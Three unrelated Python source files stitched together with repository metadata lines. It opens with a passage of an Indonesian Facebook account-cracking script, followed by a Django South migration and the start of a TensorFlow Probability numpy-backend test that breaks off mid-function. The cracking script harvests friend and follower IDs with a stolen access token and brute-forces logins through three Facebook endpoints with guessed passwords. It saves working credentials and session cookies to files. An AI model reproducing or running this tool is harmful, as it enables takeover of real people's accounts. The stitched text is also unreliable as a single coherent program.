print('[*] Ops eror yah suhu ')
print('[!] Makanya jangan di rubah suhu ');sys.exit()
else:pass
global token
os.system('clear')
try:
kontol = open('token.txt', 'r').read()
otw = requests.get('https://graph.facebook.com/me/?access_token=' + kontol)
a = json.loads(otw.text)
nama = a['name']
uid = a['id']
ttl = a['birthday']
except (KeyError, IOError):
os.system('clear')
print("\n %s[!] token kadaluwarsa!"%(P));time.sleep(2)
os.system('rm -f token.txt')
login()
except requests.exceptions.ConnectionError:
exit(" %s[!] anda tidak terhubung ke internet!"%(M))
semangat()
___parah___(AUTHOR_SCRIPT,PENGGUNA_SCRIPT)
jalan('[+] selamat datang %s '%(nama))
print(' ')
print('[+] ID Kamu : '+(uid));time.sleep(0.1)
print('[+] Ttl Kamu : '+(ttl));time.sleep(0.1)
print('[+] Kamu masuk pada : '+(tanggal));time.sleep(0.1)
print('\n[1] Crack dari publik/teman');time.sleep(0.1)
print('[2] Crack dari followers');time.sleep(0.1)
print('[3] Crack facebook massal ');time.sleep(0.1)
print('[4] Crack akun baru');time.sleep(0.1)
print('[5] Crack akun old/lama');time.sleep(0.1)
print('[6] Get data² target');time.sleep(0.1)
print('[7] Seting user-agent');time.sleep(0.1)
print('[8] Cek opsi chekpoint');time.sleep(0.1)
print('[9] Cek hasil');time.sleep(0.1)
print('[L] Lapor bug');time.sleep(0.1)
print('[0] Keluar ngentod\n');time.sleep(0.1)
___mmk___ = raw_input('[?] pilih menu : ');time.sleep(0.1)
if ___mmk___ in ['',' ', '']:
print('\n[*] Kasian masih kecil matanya buram')
___dihiXD___ = raw_input('[ Enter mas maaf bercanda kok ] ');menu()
elif ___mmk___ in ['1','01']:
___publik___() #
__metode__()
elif ___mmk___ in ['2','02']:
follo() #
__metode__()
elif ___mmk___ in ['3','03']:
___massal___() #
__metode__()
elif ___mmk___ in ['4','04']:
___fbbaru() #
__metode()
elif ___mmk___ in ['5','05']:
___fblama() #
__metode__()
elif ___mmk___ in ['6','06']:
jalan('[*] Maaf menu ini non aktif');menu() #
elif ___mmk___ in ['7','07']:
ua() #
elif ___mmk___ in ['8','08']:
opsi()
elif ___mmk___ in ['9','09']:
hasil()
elif ___mmk___ in ['0','00']:
os.system('rm -rf token.txt');exit() #
elif ___mmk___ in ['l','L']:
os.system('xdg-open https://wa.me/qr/VOPTEUBSWABNH1')
menu()
else:
menu()
def hasil():
print('+──────────────────────────────────────────+')
print('[1]. lihat hasil crack OK ')
print('[2]. lihat hasil crack CP ')
print('+──────────────────────────────────────────+')
anjg = raw_input('[?] pilih : ')
if anjg == '':
menu()
elif anjg == "1":
dirs = os.listdir("OK")
print('+──────────────────────────────────────────+')
for file in dirs:
print("[*] "+file)
try:
print('+──────────────────────────────────────────+')
file = raw_input("[?] file : ")
if file == "":
menu()
totalok = open("OK/%s"%(file)).read().splitlines()
except IOError:
exit("[!] file %s tidak tersedia"%(file))
print('──────────────────────────────────────────')
os.system("cat OK/%s"%(file))
print('──────────────────────────────────────────')
input("[*] tekan enter untuk kembali ke menu")
menu()
elif anjg == "2":
dirs = os.listdir("CP")
print('──────────────────────────────────────────')
for file in dirs:
print("[*] "+file)
try:
print('──────────────────────────────────────────')
file = raw_input("[?] file : ")
if file == "":
menu()
totalcp = open("CP/%s"%(file)).read().splitlines()
except IOError:
exit("[!] file %s tidak tersedia"%(file))
print('──────────────────────────────────────────')
os.system("cat CP/%s"%(file))
print('──────────────────────────────────────────')
raw_input("[*] tekan enter untuk kembali ke menu ")
menu()
else:
menu()
def opsi():
dirs = os.listdir("CP")
for file in dirs:
print("[*] CP/"+file)
print('+──────────────────────────────────────────+')
files = raw_input("[?] file : ")
if files == "":
menu()
try:
buka_baju = open(files, "r").readlines()
except IOError:
exit("\n[!] nama file %s tidak tersedia"%(files))
ubahpw()
print('\n[!] anda bisa mematikan data selular untuk menjeda proses cek')
print('+──────────────────────────────────────────+')
for memek in buka_baju:
kontol = memek.replace("\n","")
titid = kontol.split("|")
print("[+] cek : %s%s%s"%(K,kontol.replace(" * --> ",""),N))
try:
cek_opsi(titid[0].replace(" * --> ",""), titid[1])
except requests.exceptions.ConnectionError:
pass
print('+──────────────────────────────────────────+')
print("\n[!] cek akun sudah selesai...")
input("[*] tekan enter untuk kembali ke menu ")
time.sleep(1)
menu()
def ua():
if ___khamdihi___ not in '___my___frinds___the___best___':
os.system('clear');semangath()
print('[*] Makanya jangan di ganti bang')
print('[+] Wenak mau rekode gagal enak')
else:pass
ajg = raw_input("[?] masukan ua : ")
if ajg in[""]:
menu()
else:
try:
zedd = open('ua.txt', 'w')
zedd.write(ajg)
zedd.close()
print("[✓] berhasil mengganti ua")
raw_input("[*] tekan enter untuk kembali")
menu()
except KeyError:
exit()
def follo():
global token
try:
kontol = open("token.txt", "r").read()
except IOError:
exit(" [!] token kadaluwarsa")
print("[*] Type 'me' jika ingin crack dari pengikut sendiri")
idt = raw_input("[!] masukan id atau username : ")
try:
for i in requests.get("https://graph.facebook.com/%s/subscribers?limit=5000&access_token=%s"%(idt, kontol)).json()["data"]:
uid = i["id"]
nama = i["name"]
id.append(uid+"<=>"+nama)
except KeyError:
exit(" [!] akun tidak tersedia atau list teman private")
print("[+] total id : %s%s%s"%(M,len(id),N))
def ___fbbaru():
x = 11111111111
xx = 77777777777
idx = "5000"
limit = int(raw_input("[•] Masukan limit id (cth 5000): "))
try:
for n in range(limit):
_ = random.randint(x,xx)
__ = idx
id.append(__+"<=>"+str(_))
except KeyError:
exit('[!] Kayaknya ada yang eror kek otak lu')
print("[+] total id : %s%s%s"%(M,len(id),N))
def ___publik___():
global token
try:
kontol = open("token.txt", "r").read()
except IOError:
exit("[!] token kadaluwarsa")
time.sleep (0.01)
print
jalan("[+] Ketik [ me ] jika ingin crack from teman")
time.sleep (0.01)
idt = raw_input("[?] Masukan id : ")
try:
for i in requests.get("https://graph.facebook.com/%s/friends?access_token=%s"%(idt, kontol)).json()["data"]:
id.append(i["id"]+"<=>"+i["name"])
except KeyError:
exit("[!] Id tidak publik")
print("[✓] Total id : %s%s%s"%(M,len(id),N))
def ___fblama():
x = 111111111
xx = 999999999
idx = "5000"
limit = int(raw_input("[+] Masukan limit id (cth 5000): "))
try:
for n in range(limit):
_ = random.randint(x,xx)
__ = idx
id.append(__+"<=>"+str(_))
except KeyError:
exit('[!] Id privat/script lagi eror kek otak lu')
print("[!] total id : %s%s%s"%(P,len(id),N))
def ___massal___():
if ____rekode____ not in '___hayu___mau___rekodeya___':
print('[×] Makanya jangan di ganti ngentod');sys.exit()
else:pass
global token
try:
token = open("token.txt", "r").read()
except IOError:
exit(" [!] token kadaluwarsa")
try:
tanya_total = int(raw_input("[?] Masukan jumlah id target : "))
except:tanya_total=1
print("[×] Type 'me' jika ingin crack dari daftar teman")
for t in range(tanya_total):
t +=1
idt = raw_input("[?] id target %s : "%(t))
try:
for i in requests.get("https://graph.facebook.com/%s/friends?access_token=%s"%(idt, token)).json()["data"]:
uid = i["id"]
nama = i["name"]
id.append(uid+"<=>"+nama)
except KeyError:
print("[!] Akun privat/id kamu slaah")
print("[+] total id : %s%s%s"%(P,len(id),N))
def __metode__():
time.sleep(2)
print('\n[1] Metode b-api | crack fast')
print('[2] Metode mbasic | crack selow')
print('[3] Metode mobile | rekomendasi')
print('[0] Jika id = 0 kembali aja ke menu\n')
dihi = raw_input('[?] Metode chose : ')
print(' ')
if dihi =='':
print('[!] Pilih salah satu kontol')
time.sleep(2);__metode__()
elif dihi in ['1','01']:
print('[*] Hasil ok tersimpan di ok.txt')
print('[*] Hasil cp tersimpan di cp.txt\n')
with ThreadPoolExecutor(max_workers=30) as fall:
for user in id:
uid, name = user.split("<=>")
nam = name.split(' ')
if len(name) == 3 or len(name) == 4 or len(name) == 5 or len(name) == 6:
pwx = [name, nam[0]+"123", nam[0]+"12345",nam[0]+"1234",nam[0]+"123456", "sayang", "kontol", "anjing"]
else:
pwx = [name, nam[0]+"123", nam[0]+"12345",nam[0]+"1234",nam[0]+"123456", "sayang", "kontol", "anjing"]
fall.submit(bapi, user)
exit("\n\n [!] crack selesai, salin terlebih dahulu")
elif dihi in ['2','02']:
print('[*] Hasil ok tersimpan di ok.txt')
print('[*] Hasil cp tersimpan di cp.txt\n')
with ThreadPoolExecutor(max_workers=30) as fall:
for user in id:
uid, name = user.split("<=>")
nam = name.split(' ')
if len(name) == 3 or len(name) == 4 or len(name) == 5 or len(name) == 6:
pwx = [name, nam[0]+"123", nam[0]+"12345",nam[0]+"1234",nam[0]+"123456", "sayang", "kontol", "anjing"]
else:
pwx = [name, nam[0]+"123", nam[0]+"12345",nam[0]+"1234",nam[0]+"123456", "sayang", "kontol", "anjing"]
fall.submit(mbasic, user)
exit("\n\n\x1b[1;97m [#] crack selesai, salin hasilnya")
elif dihi in ['3','03']:
print('[*] Hasil ok tersimpan di ok.txt')
print('[*] Hasil cp tersimpan di cp.txt\n')
with ThreadPoolExecutor(max_workers=30) as fall:
for user in id:
uid, name = user.split("<=>")
nam = name.split(' ')
if len(name) == 3 or len(name) == 4 or len(name) == 5 or len(name) == 6:
pwx = [name, nam[0]+"123", nam[0]+"12345",nam[0]+"1234",nam[0]+"123456", "sayang", "kontol", "anjing"]
else:
pwx = [name, nam[0]+"123", nam[0]+"12345",nam[0]+"1234",nam[0]+"123456", "sayang", "kontol", "anjing"]
fall.submit(mobile,user)
exit("\n\n [#] \x1b[1;97mcrack selesai...")
elif dihi in ['0','00']:
menu()
else:
__metode__()
def mobile(user):
try:
ua = open("ua", "r").read()
except IOError:
ua = ("Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]")
global loop, token
sys.stdout.write(
"\r[Crack] (%s) - (%s) OK:-%s - CP:-%s "%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
uid, name = user.split("<=>")
if len(name)>=6:
pwx = [ name, name+"123", name+"1234", name+"12345" ]
elif len(name)<=2:
pwx = [ name+"123", name+"1234", name+"12345" ]
elif len(name)<=3:
pwx = [ name+"123", name+"12345" ]
else:
pwx = [ name+"123", name+"12345" ]
try:
for pw in pwx:
kwargs = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"Host":"m.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://m.facebook.com")
b = bs4.BeautifulSoup(p.text, 'html.parser')
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:kwargs.update({i.get("name"):i.get("value")})
else:continue
except:pass
kwargs.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","prefill_type": "","first_prefill_source": "","first_prefill_type": "","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","_fb_noscript": "true"})
gaaa = ses.post("https://m.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Ftouch.facebook.com%2F&lwv=100&refid=8",data=kwargs)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print("\r\x1b[1;92m[OK] %s|%s|%s\033[0;97m"%(uid, pw, kuki))
ok.append("%s|%s"%(uid, pw))
open("OK/%s.txt"%(tanggal),"a").write(" [OK] %s|%s\n"%(uid, pw))
break
continue
elif "checkpoint" in ses.cookies.get_dict().keys():
print("\r\033[0;95m[CP] %s|%s\033[0;91m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("CP/%s.txt"%(tanggal),"a").write(" [CP] %s|%s|%s %s %s\n"%(uid, pw, day, month, year))
break
continue
loop += 1
except:
pass
def bapi(user):
try:
ua = open(".ua", "r").read()
except IOError:
ua = ("Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]")
global loop, token
sys.stdout.write(
"\r[Crack] %s/%s -> OK:-%s - CP:-%s "%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
uid, name = user.split("<=>")
if len(name)>=6:
pwx = [ name, name+"123", name+"1234", name+"12345" ]
elif len(name)<=2:
pwx = [ name+"123", name+"1234", name+"12345" ]
elif len(name)<=3:
pwx = [ name+"123", name+"12345" ]
else:
pwx = [ name+"123", name+"12345" ]
try:
for pw in pwx:
pw = pw.lower()
ses = requests.Session()
headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": ua, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
send = ses.get("https://b-api.facebook.com/method/auth.login?format=json&email="+str(uid)+"&password="+str(pw)+"&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20¤tly_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=true", headers=headers_)
if "session_key" in send.text and "EAAA" in send.text:
print("\r\x1b[1;92m[OK] %s|%s|%s\033[0;97m"%(uid, pw, send.json()["access_token"]))
ok.append("%s|%s"%(uid, pw))
open("OK/%s.txt"%(tBilall),"a").write(" + %s|%s\n"%(uid, pw))
break
continue
elif "www.facebook.com" in send.json()["error_msg"]:
print("\r\x1b[1;92m[CP] %s|%s\033[0;92m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("CP/%s.txt"%(tBilall),"a").write(" + %s|%s\n"%(uid, pw))
break
continue
loop += 1
except:
pass
def mbasic(user):
try:
ua = open(".ua", "r").read()
except IOError:
ua = ("Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]")
global loop, token
sys.stdout.write(
"\r[Crack] %s/%s -> OK:-%s - CP:-%s "%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
uid, name = user.split("<=>")
if len(name)>=6:
pwx = [ name, name+"123", name+"1234", name+"12345" ]
elif len(name)<=2:
pwx = [ name+"123", name+"1234", name+"12345" ]
elif len(name)<=3:
pwx = [ name+"123", name+"12345" ]
else:
pwx = [ name+"123", name+"12345" ]
try:
for pw in pwx:
kwargs = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"origin": "https://mbasic.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip, deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": ua, "Host": "mbasic.facebook.com", "referer": "https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8", "cache-control": "max-age=0", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded"})
p = ses.get("https://mbasic.facebook.com/login/?next&ref=dbl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:kwargs.update({i.get("name"):i.get("value")})
else:continue
except:pass
kwargs.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","prefill_type": "","first_prefill_source": "","first_prefill_type": "","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","_fb_noscript": "true"})
gaaa = ses.post("https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8",data=kwargs)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print("\r\x1b[1;92m[OK] %s|%s|%s\033[0;95m"%(uid, pw, kuki))
ok.append("%s|%s"%(uid, pw))
open("OK/%s.txt"%(tanggal),"a").write(" [OK] %s|%s\n"%(uid, pw))
break
continue
elif "checkpoint" in ses.cookies.get_dict().keys():
print("\r\x1b[1;92m[CP] %s|%s\033[0;96m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("CP/%s.txt"%(tanggal),"a").write(" [CP] %s|%s\n"%(uid, pw))
break
continue
loop += 1
except:
pass
if __name__ == '__main__':
os.system('git pull')
os.system('clear')
jalan("\x1b[1;92m[✓] Suscribe chenel aku dulu ya bang ';(")
os.system('xdg-open https://youtube.com/channel/UCOqxx2kjYPypVct2l81Y1Jw')
___cek___(___dihi___,___khaa___,___rekode___)
| 36.693793 | 565 | 0.569222 |
85cbb1cfca0c56e44ca33b65287235a4cb9a78c9 | 5,872 | py | Python | post_office/south_migrations/0014_auto__add_field_backendaccess_backend_class.py | carrerasrodrigo/django-post_office | 0257a39f9f2d20c1a42c58e8fd4dfaf591221132 | [
"MIT"
] | null | null | null | post_office/south_migrations/0014_auto__add_field_backendaccess_backend_class.py | carrerasrodrigo/django-post_office | 0257a39f9f2d20c1a42c58e8fd4dfaf591221132 | [
"MIT"
] | null | null | null | post_office/south_migrations/0014_auto__add_field_backendaccess_backend_class.py | carrerasrodrigo/django-post_office | 0257a39f9f2d20c1a42c58e8fd4dfaf591221132 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'BackendAccess.backend_class'
db.add_column(u'post_office_backendaccess', 'backend_class',
self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'BackendAccess.backend_class'
db.delete_column(u'post_office_backendaccess', 'backend_class')
models = {
u'post_office.attachment': {
'Meta': {'object_name': 'Attachment'},
'emails': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'attachments'", 'symmetrical': 'False', 'to': u"orm['post_office.Email']"}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'post_office.backendaccess': {
'Meta': {'object_name': 'BackendAccess'},
'backend_class': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'host': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_time_sent': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'limit_min': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '250'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'port': ('django.db.models.fields.IntegerField', [], {}),
'total_sent_last_min': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'use_tsl': ('django.db.models.fields.BooleanField', [], {}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'post_office.email': {
'Meta': {'object_name': 'Email'},
'backend_access': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['post_office.BackendAccess']", 'null': 'True', 'blank': 'True'}),
'bcc': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'cc': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'context': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
'from_email': ('django.db.models.fields.CharField', [], {'max_length': '254'}),
'headers': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'html_message': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'priority': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'scheduled_time': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'subject': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'template': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['post_office.EmailTemplate']", 'null': 'True', 'blank': 'True'}),
'to': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
u'post_office.emailtemplate': {
'Meta': {'object_name': 'EmailTemplate'},
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'html_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'subject': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
u'post_office.log': {
'Meta': {'object_name': 'Log'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'logs'", 'to': u"orm['post_office.Email']"}),
'exception_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {})
}
}
complete_apps = ['post_office'] | 68.27907 | 172 | 0.566928 |
20ed3c4dfb1f1d2f7ff4e4991acde4ac548cb58d | 77,149 | py | Python | tensorflow_probability/python/internal/backend/numpy/numpy_test.py | mederrata/probability | bc6c411b0fbd83141f303f91a27343fe3c43a797 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/python/internal/backend/numpy/numpy_test.py | mederrata/probability | bc6c411b0fbd83141f303f91a27343fe3c43a797 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/python/internal/backend/numpy/numpy_test.py | mederrata/probability | bc6c411b0fbd83141f303f91a27343fe3c43a797 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for internal.backend.numpy."""
import functools
# Dependency imports
from absl import flags
from absl import logging
from absl.testing import parameterized
import hypothesis as hp
import hypothesis.extra.numpy as hnp
import hypothesis.strategies as hps
import mock
import numpy as np # Rewritten by script to import jax.numpy
import numpy as onp # pylint: disable=reimported
import scipy.special as scipy_special
import six
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.internal import dtype_util
from tensorflow_probability.python.internal import hypothesis_testlib as tfp_hps
from tensorflow_probability.python.internal import test_util
from tensorflow_probability.python.internal.backend import numpy as nptf
from tensorflow_probability.python.internal.backend.numpy import functional_ops as np_pfor
import tensorflow_probability.substrates.numpy as tfp
from tensorflow.python.ops import parallel_for as tf_pfor # pylint: disable=g-direct-tensorflow-import
# Allows us to test low-level TF:XLA match.
flags.DEFINE_enum('test_mode', 'numpy', ['numpy', 'xla'],
'Set to `"xla"` to compare TF with TF-XLA. '
'Default compares tf to nptf.')
flags.DEFINE_bool('only_disabled', False, 'Only test disabled XLA tests')
flags.DEFINE_bool('use_tpu', False, 'Verifies numerics on TPU.')
flags.DEFINE_list('xla_disabled', [],
'List of endpoints to skip. Allows us per-device blocklists.')
FLAGS = flags.FLAGS
ALLOW_NAN = False
ALLOW_INFINITY = False
ALLOW_SUBNORMAL = False
JAX_MODE = False
NUMPY_MODE = not JAX_MODE
# pylint is unable to handle @hps.composite (e.g. complains "No value for
# argument 'batch_shape' in function call"), so disable this lint for the file.
# pylint: disable=no-value-for-parameter
class Kwargs(dict):
"""Sentinel to indicate a single item arg is actually a **kwargs."""
# See usage with raw_ops.MatrixDiagPartV2.
pass
def _add_jax_prng_key_as_seed():
import jax.random as jaxrand # pylint: disable=g-import-not-at-top
return dict(seed=jaxrand.PRNGKey(123))
def _getattr(obj, name):
names = name.split('.')
return functools.reduce(getattr, names, obj)
def _maybe_get_subnormal_kwarg(allow_subnormal=ALLOW_SUBNORMAL):
if hp.__version_info__ >= (6, 30):
return {'allow_subnormal': allow_subnormal}
return {}
class TestCase(dict):
"""`dict` object containing test strategies for a single function."""
def __init__(self, name, strategy_list, **kwargs):
self.name = name
tensorflow_function = kwargs.pop('tensorflow_function', None)
if not tensorflow_function:
tensorflow_function = _getattr(tf, name)
numpy_function = kwargs.pop('numpy_function', None)
if not numpy_function:
numpy_function = _getattr(
nptf,
name.replace('random.', 'random.stateless_'
).replace('random.stateless_gamma', 'random.gamma'))
super(TestCase, self).__init__(
testcase_name='_' + name.replace('.', '_'),
tensorflow_function=tensorflow_function,
numpy_function=numpy_function,
strategy_list=strategy_list,
name=name,
**kwargs)
def __repr__(self):
return 'TestCase(\'{}\', {})'.format(self.name, self['strategy_list'])
# Below we define several test strategies. Each describes the valid inputs for
# different TensorFlow and numpy functions. See hypothesis.readthedocs.io for
# mode detail.
@hps.composite
def floats(draw,
min_value=-1e16,
max_value=1e16,
allow_nan=ALLOW_NAN,
allow_infinity=ALLOW_INFINITY,
allow_subnormal=ALLOW_SUBNORMAL,
dtype=None):
if dtype is None:
dtype = np.float32 if FLAGS.use_tpu else np.float64
if min_value is not None:
min_value = onp.array(min_value, dtype=dtype).item()
if max_value is not None:
max_value = onp.array(max_value, dtype=dtype).item()
subnormal_kwarg = _maybe_get_subnormal_kwarg(allow_subnormal)
return draw(hps.floats(min_value=min_value,
max_value=max_value,
allow_nan=allow_nan,
allow_infinity=allow_infinity,
width=np.dtype(dtype).itemsize * 8,
**subnormal_kwarg))
def integers(min_value=-2**30, max_value=2**30):
return hps.integers(min_value, max_value)
def complex_numbers(min_magnitude=0.,
max_magnitude=1e16,
allow_nan=ALLOW_NAN,
allow_infinity=ALLOW_INFINITY,
dtype=np.complex64):
# TODO(jburnim): In the np.complex64 case, directly build np.complex64 values
# with Hypothesis instead of building np.complex128 and casting.
return hps.builds(
dtype,
hps.complex_numbers(
min_magnitude=min_magnitude,
max_magnitude=max_magnitude,
allow_nan=allow_nan,
allow_infinity=allow_infinity))
@hps.composite
def non_zero_floats(draw, *args, **kwargs):
return draw(floats(*args, **kwargs).filter(lambda x: np.all(x != 0.)))
positive_floats = functools.partial(floats, min_value=1e-6)
def shapes(min_dims=0, max_dims=4, min_side=1, max_side=5):
strategy = hnp.array_shapes(
min_dims=max(1, min_dims),
max_dims=max_dims,
min_side=min_side,
max_side=max_side)
if min_dims < 1:
strategy = hps.one_of(hps.just(()), strategy)
return strategy
def fft_shapes(fft_dim, max_fft_size=32):
sizes = [s for s in [2, 4, 8, 16, 32] if s <= max_fft_size]
return hps.tuples(
shapes(max_dims=2), # batch portion
hps.lists(min_size=fft_dim, max_size=fft_dim,
elements=hps.sampled_from(sizes))).map(
lambda t: t[0] + tuple(t[1]))
@hps.composite
def n_same_shape(draw, n, shape=shapes(), dtype=None, elements=None,
as_tuple=True, batch_shape=(), unique=False,
allow_nan=ALLOW_NAN):
if dtype is None:
dtype = np.float32 if FLAGS.use_tpu else np.float64
if elements is None:
if dtype in (np.float32, np.float64):
if allow_nan:
elements = floats(min_value=None, max_value=None,
allow_nan=allow_nan, dtype=dtype)
else:
elements = floats(dtype=dtype)
elif dtype in (np.int32, np.int64):
elements = integers()
elif dtype in (np.complex64, np.complex128):
elements = complex_numbers(dtype=dtype)
elif dtype == np.bool_:
elements = hps.booleans()
else:
raise ValueError('Unexpected dtype: {}'.format(dtype))
shape = tuple(batch_shape) + draw(shape)
ensure_array = lambda x: onp.array(x, dtype=dtype)
if isinstance(elements, (list, tuple)):
return tuple([
draw(hnp.arrays(
dtype, shape, unique=unique, elements=e).map(ensure_array))
for e in elements
])
array_strategy = hnp.arrays(
dtype, shape, unique=unique, elements=elements).map(ensure_array)
if n == 1 and not as_tuple:
return draw(array_strategy)
return draw(hps.tuples(*([array_strategy] * n)))
single_arrays = functools.partial(n_same_shape, n=1, as_tuple=False)
@hps.composite
def array_axis_tuples(draw, strategy=None, elements=None, dtype=None,
allow_nan=ALLOW_NAN, allow_multi_axis=False):
x = draw(strategy or single_arrays(shape=shapes(min_dims=1),
elements=elements,
dtype=dtype,
